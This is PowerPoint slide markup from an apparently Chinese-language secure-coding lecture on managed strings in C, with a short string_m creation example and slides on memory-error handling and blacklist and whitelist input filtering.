            <a:off x="5867400" y="4679776"/>
            <a:ext cx="2971800" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71903"/>
              <a:gd name="adj2" fmla="val -48750"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>捕捉内存错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409607" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="6356176"/>
            <a:ext cx="3505200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -88361"/>
              <a:gd name="adj2" fmla="val -275417"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>处理剩下的异常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="180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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3886688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9604"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="409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9605"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4096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9606"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4096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09607"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="409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4" grpId="0" animBg="1"/>
      <p:bldP spid="409605" grpId="0" animBg="1"/>
      <p:bldP spid="409606" grpId="0" animBg="1"/>
      <p:bldP spid="40960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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>管理字符串</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>管理动态字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>分配缓冲区</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果需要额外的内存，则重新调整内存大小</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>管理字符串操作，以确保</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串操作没有导致缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>数据没有丢失</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串正常终止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串可能是也可能不是内部空结尾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缺点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>无限制地消耗内存，可能导致拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>性能开销</a:t>
            </a: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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37942725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zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>数据类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>使用一个不透明的数据类型管理字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>struct string_mx; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	typedef struct 	string_mx *string_m;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>这种类型的特征是</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>私有的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>特定实现的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41298495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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>回收字符串的例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>errno_t retValue; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char *cstr;  // c style string </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>string_m str1 = NULL;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>if (retValue = strcreate_m(&amp;str1, "hello, world")) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  fprintf(stderr, "Error %d from strcreate_m.\n", retValue);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>else { // print string </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  if (retValue = getstr_m(&amp;cstr, str1)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>    fprintf(stderr, "error %d from getstr_m.\n", retValue); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  printf("(%s)\n", cstr); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  free(cstr); // free duplicate string </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443396" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5038725" y="1336675"/>
            <a:ext cx="3524250" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107611"/>
              <a:gd name="adj2" fmla="val 48269"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>状态码统一提供返回值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>防止嵌套</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>鼓励状态检查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2795413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3396"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="443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zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>黑名单</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95235" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>用下划线或其他无害的字符来取代危险的字符串输入。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>需要程序员来识别所有危险的字符和字符组合</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果对被调用的项目、流程、库或组件没有很详细的了解是很难错操作的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>有可能在编码或转义危险的字符后，成功地绕过了黑名单检查。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11233398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sz="3000">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>白名单</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000">
